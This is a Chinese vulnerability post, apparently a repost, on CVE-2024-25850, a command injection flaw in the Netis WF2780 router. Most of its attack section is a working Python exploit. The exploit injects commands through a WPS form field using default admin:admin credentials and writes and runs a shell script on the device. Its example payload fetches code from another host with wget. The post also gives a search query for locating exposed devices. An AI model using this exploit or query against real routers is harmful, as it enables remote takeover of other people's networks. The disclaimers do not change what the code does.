免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
01
—
漏洞名称
02
—
漏洞影响
Netis WF2780 v2.1.40144版本
https://www.netis-systems.com/Suppory/de_details/id/1/de/189.html03
—
漏洞描述
Netis是一家专门从事网络通信设备的制造商。他们提供各种网络设备,包括路由器、交换机、无线接入点和网络适配器等。Netis WF2780 v2.1.40144版本在bin/cgitest.cgi文件的函数igd_wps_set中有一个远程命令注入漏洞。会导致被远控。
04
—
title='AP setup' && header='netis'
05
—
poc
python poc文件内容如下
#!/usr/bin/env python3import urllib.parseimport socketdef send_cmd(ip, port, cmd):cmd = "";"+cmd+";""#print(f"cmd:{cmd}")body = "wps_set_5g=ap&wps_mode5g=cpin&wps_ap_ssid5g=" + urllib.parse.quote(cmd)request = "POST /cgi-bin-igd/netcore_set.cgi HTTP/1.1rn"request += f"Host: {ip}rn"request += "Content-Length: {}rn".format(len(body))request += "Authorization: Basic YWRtaW46YWRtaW4=rn"request += "Cache-Control: no-cachern"request += "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36rn"request += "content-type: application/x-www-form-urlencodedrn"request += f"Origin: http://{ip}rn"request += f"Referer: http://{ip}/index.htmrn"request += "Accept-Encoding: gzip, deflatern"request += "Accept-Language: zh-CN,zh;q=0.9rn"request += "Connection: closernrn"request += bodyc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)c.settimeout(8)c.connect((ip,port))c.send(request.encode())c.recv(1024)#print(c.recv(1024))def main(ip, port, cmd):for i in range(len(cmd)):if i == 0:_cmd = f"echo '{cmd[i]}\c' > /tmp/s.sh"else:_cmd = f"echo '{cmd[i]}\c' >> /tmp/s.sh"send_cmd(ip, port, _cmd)send_cmd(ip, port, "chmod 777 /tmp/s.sh")send_cmd(ip, port, "sh /tmp/s.sh")if __name__ == "__main__":main("192.168.1.1", 80, "cd /tmp;wget http://192.168.1.2:8888/a")#main("192.168.1.1", 80, "reboot")
06
—
修复建议
升级到最新版本。
原文始发于微信公众号(AI与网安):CVE-2024-25850
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论